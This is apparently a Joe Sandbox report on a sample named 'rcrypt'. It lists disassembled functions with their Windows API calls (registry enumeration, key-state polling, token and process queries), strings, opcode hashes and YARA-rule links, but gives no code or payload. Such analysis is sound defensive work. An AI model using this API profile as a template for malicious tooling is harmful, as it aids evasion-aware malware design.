Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
Instruction ID: 32101d4b8c40ac7b7c604aac81115426eda0cdbc6b9d1d54d0858a7c61546044
Opcode Fuzzy Hash: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
Instruction Fuzzy Hash: F811A275680208ABDF11BF64DC85FEA3778AF48700F454079BA0CAA163DB7059869B76

Function 00176B8F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00176C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00176C20

Strings

@U=u, xrefs: 00176C20
\Common Files, xrefs: 00176B9A
edit, xrefs: 00176BF5

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$\Common Files$edit
API String ID: 2978978980-4276157711
Opcode ID: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
Instruction ID: 2b01d0ee6f4be950b0ac3877b4012fd9609ce0dcbf7db91a1b0220994c52386e
Opcode Fuzzy Hash: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
Instruction Fuzzy Hash: 09118C71600608ABEB118E64DC41AFB3779EB15378F608728F969D71E0C775DC919B60

Function 00152017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00152048

Strings

KEYS, xrefs: 0015205F
APPEND, xrefs: 00152081
REMOVE, xrefs: 0015204E
EXISTS, xrefs: 00152070

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
Instruction ID: 20c54e1b352bb0d2959b266347c86528172dcc9e342bbd6e07b8cec1a55d8e6a
Opcode Fuzzy Hash: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
Instruction Fuzzy Hash: 1D116135900109DFCF04EFA4D9414FEB7B4FF26304B508468E8656B292EB32994ACB51

Function 0016EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0016EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0016EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0016F07E
CloseHandle.KERNEL32(?), ref: 0016F0FF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
Instruction ID: 2c1b40e6c95b7ae078ce0ce7c9ce2eedb474766cf224951b2cc8c0da460c3f30
Opcode Fuzzy Hash: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
Instruction Fuzzy Hash: DC81A2716043019FD724DF28DC46F6AB7E5AF88720F14881DFA99DB692DB70AC41CB92

Function 001702C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001703C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0017040E
RegCloseKey.ADVAPI32(?,?), ref: 0017043A
RegCloseKey.ADVAPI32(00000000), ref: 00170447

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: d23c8f0dca6f05a27ed809c444e178f72a343be94384efb01ad32d0d097b43ec
Instruction ID: 96ef57e97ef62c606c95316625d5fcec7c20bc1ef1ca825b5d31900d2b41ba72
Opcode Fuzzy Hash: d23c8f0dca6f05a27ed809c444e178f72a343be94384efb01ad32d0d097b43ec
Instruction Fuzzy Hash: 00512B71208304AFD705EB54DC81EAEB7F9FF88304F14892DB699972A2DB30E945DB52

Function 0015E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0015E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0015E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0015E8F2

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0015E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0015E91F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: fa19aadf8c513af76d9ba63b043787b7b1c0699e76d2e923b8077f623fb143d2
Instruction ID: 1561f013af6961629a0934a1313fef266424fe9a093bc65fcd57bb5e0bb9ec80
Opcode Fuzzy Hash: fa19aadf8c513af76d9ba63b043787b7b1c0699e76d2e923b8077f623fb143d2
Instruction Fuzzy Hash: 5E512D35A00209DFCF05EF64C981AAEBBF5EF08314B1480A9E909AB762CB31ED51DB51

Function 000F2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000F2357
ScreenToClient.USER32(001B67B0,?), ref: 000F2374
GetAsyncKeyState.USER32(00000001), ref: 000F2399
GetAsyncKeyState.USER32(00000002), ref: 000F23A7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
Instruction ID: 6e0788effaa0cddc0d280930077f0ae290f874bf2744e32c4abe5dce9c78acb0
Opcode Fuzzy Hash: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
Instruction Fuzzy Hash: 8A41C371504129FBCF199F64D844AFEBBB4FB15360F204319F92996290CB309EA4EFA1

Function 00146920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014695D
TranslateAcceleratorW.USER32(?,?,?), ref: 001469A9
TranslateMessage.USER32(?), ref: 001469D2
DispatchMessageW.USER32(?), ref: 001469DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001469EB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
Instruction ID: 6020cbd7d69380aa74136040497897d3be4f2ced27181cdc408896aea13ca0fb
Opcode Fuzzy Hash: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
Instruction Fuzzy Hash: 0A31E371900646AEDB24CF74CC44BB67BBCBB2630CF204269E425D35B1D7B898C6D792

Function 00148F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00148F12
PostMessageW.USER32(?,00000201,00000001), ref: 00148FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00148FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00148FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00148FDA

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
Instruction ID: 46a041e023f6717328f85d37e79df4dfbd4f24a5b2ab2cf82cde662389a1fe10
Opcode Fuzzy Hash: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
Instruction Fuzzy Hash: 7831CE71500219EFDB14CF68D94CAAE7BB6EB04325F104229F929EA1E0C7B09998DB90

Function 0017B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

GetWindowLongW.USER32(?,000000F0), ref: 0017B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0017B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0017B489
GetSystemMetrics.USER32(00000004), ref: 0017B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00161184,00000000), ref: 0017B4D0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 50317d51d3ef3c4ee70e81c5d053a055deaf0df2b2d5c09833eb4030a7334e74
Instruction ID: 81e8b86328f947463e93787804481b708c311d5686e6a0519b0217bbae502b54
Opcode Fuzzy Hash: 50317d51d3ef3c4ee70e81c5d053a055deaf0df2b2d5c09833eb4030a7334e74
Instruction Fuzzy Hash: 35216071518255AFCB149F39CC88B6A37B4FB05720F258728F92BD75E1E7309891DB90

Function 000F12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
SelectObject.GDI32(?,00000000), ref: 000F135C
BeginPath.GDI32(?), ref: 000F1373
SelectObject.GDI32(?,00000000), ref: 000F139C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 86cbb39c006112b66bab78464ac3ed5731df686f2d460dac23d672c1eaa7fca1
Instruction ID: a7fcd40341da55880436b6e395950aea5a536084ae284a4899933035382bbad7
Opcode Fuzzy Hash: 86cbb39c006112b66bab78464ac3ed5731df686f2d460dac23d672c1eaa7fca1
Instruction Fuzzy Hash: 45210E71800308EBDB119F25EC447B97BF9FB10321F14432AF91896DA1D77999E1EB90

Function 0014C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0014C176
_memcmp.LIBCMT ref: 0014C194
_memcmp.LIBCMT ref: 0014C1A7
_memcmp.LIBCMT ref: 0014C1BF
_memcmp.LIBCMT ref: 0014C1D7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a64a7f06c3055140f8161835599f744514e6dbb1f50655fa9ebb192e060cf756
Instruction ID: 34686ce5bac3d4f8f751bb69835db060be3546d6e0c19088c552acfba7bef037
Opcode Fuzzy Hash: a64a7f06c3055140f8161835599f744514e6dbb1f50655fa9ebb192e060cf756
Instruction Fuzzy Hash: F501B5B1A06105BBE209B6209C42FBBB75C9B21BA4F044021FE04962A3E7A1EF11C7F0

Function 00154D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00154D5C
__beginthreadex.LIBCMT ref: 00154D7A
MessageBoxW.USER32(?,?,?,?), ref: 00154D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00154DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00154DAC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 9a9c44604dde820c3b3c432691f0e3fe8bf43775d3c35131ca45cd39b9f9b19b
Instruction ID: 43ac49f1b039cbcb6f8259887172b0db1ca9b619604c367c7fae55369e8f1b80
Opcode Fuzzy Hash: 9a9c44604dde820c3b3c432691f0e3fe8bf43775d3c35131ca45cd39b9f9b19b
Instruction Fuzzy Hash: EF11E576904208EBD7019BA8DC08ADB7BBCEB55325F1443A9FD28D7650D7758DC48BA0

Function 0014874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a6edb19ac7350db9b8092145849ffb8c45b1a2b9ebe1bb6d33790eeed87d4042
Instruction ID: 2566315b0cd605c84997dd44221cdb107ae0c463ccbcc91cd4e86eff9c79885e
Opcode Fuzzy Hash: a6edb19ac7350db9b8092145849ffb8c45b1a2b9ebe1bb6d33790eeed87d4042
Instruction Fuzzy Hash: 1A014B71204208EFDB204FA6DC88D6BBBBCFF89356B200439F849C2260DB318C81CA60

Function 001554E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: eec74c392914c9712100ae8798ab8b8df092ca159618708acfb17c6975d922d3
Instruction ID: ad2e7933f158c315f846b5c748c56e09f9d75d1996f1062647660c565f302e0a
Opcode Fuzzy Hash: eec74c392914c9712100ae8798ab8b8df092ca159618708acfb17c6975d922d3
Instruction Fuzzy Hash: 0C015B31C10A2DDBCF00DFE8E8989EEBB7AFB09712F41005AE815F6540EB309598C7A1

Function 00147652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 001476B4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: d4671f82849b73373349d08ff66660424ff7b1bb6453f2c758f40438c5e7a32b
Instruction ID: 148540a1e2825810404b8129c1edb3f414e89bc5404321ab45f8db24fea04d69
Opcode Fuzzy Hash: d4671f82849b73373349d08ff66660424ff7b1bb6453f2c758f40438c5e7a32b
Instruction Fuzzy Hash: E9018476605614BBEB109F58DC44BAE7BBEEF45751F150028FD08D2271E731DD8197A0

Function 001485F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4400ef85a5abacae957ad8b09e363f90d1392cb96eac872b42b67f935da8acd3
Instruction ID: fddff0a5258d1e69a8692ae84107a990125383cd2987e27a12ad3faf31fddf2f
Opcode Fuzzy Hash: 4400ef85a5abacae957ad8b09e363f90d1392cb96eac872b42b67f935da8acd3
Instruction Fuzzy Hash: 00F04F35201204AFEB100FA9DC89E6F3BBDFF89B54F500439F949C6160CB619C82DA60

Function 00148652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00148669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00148673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00148682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00148689
